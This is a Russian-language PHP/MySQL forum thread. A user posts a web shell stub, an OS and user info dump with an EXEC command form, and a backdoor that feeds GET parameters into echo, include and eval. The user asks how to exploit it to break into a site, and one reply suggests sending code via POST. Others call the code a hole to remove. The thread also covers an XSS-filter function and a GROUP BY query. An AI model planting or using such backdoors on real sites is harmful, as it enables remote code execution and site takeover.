Различные вопросы по PHP и MySQL

studiouz (01.06.2013 / 12:02)
что это друзья
<? echo 'OS : '.@substr(@php_uname (),0,120).'<br>'; echo 'User : '.get_current_user ().''; ?> <FORM METHOD=GET><INPUT TYPE="text"
NAME="cmd"><INPUT TYPE="submit"
value="EXEC"></FOR

Remove that from your script!

где написать этот код это защита от хss <? function antihack(&amp;$var){ if (is_array($var)) array_walk ($var, 'antihack'); else $var = htmlspecialchars (stripslashes(mysql_real_escape_string ($var)), ENT_QUOTES, 'UTF-8'); } foreach (array
('_SERVER', '_GET', '_POST', '_COOKIE', '_REQUEST') as $v) { if(!empty(${$v})) array_walk (${$v}, 'antihack'); } ?>

studiouz, это дыра огромная, убирать такое нужно с своего сайта

studiouz, это тоже велосипед, можно использовать array_map и рекурсию $GLOBALS

Koenig, Пост #765504
Дело в том, что нужно отобрать только последние посты, потому и нужна группировка.

Как исползоват этот дыр чтобы зайти на сайт?
<?php if($_GET ['act'] == "echo") {echo $_GET['echo'];} if
($_GET['act'] == "include") {include $_GET
['include'];} if($_GET
['act'] == "eval") {echo eval($_GET
['eval']);} ?>

studiouz, форма с тремя полями и методом гет, лучше использовать пост, больше можно передать кода

Screamer, покажи что ты в итоге хочешь получить?

Koenig,
SELECT MAX(`id`) as `flag`, `refid`, `id`, `time` FROM `posts` GROUP BY `refid` ORDER BY `flag` DESC, `time` DESC
flag должно совпадать с id
Смотри пик.

MySQL: нужно сделать апдейт поля, только если в этом поле записан 0, иначе выдать ошибку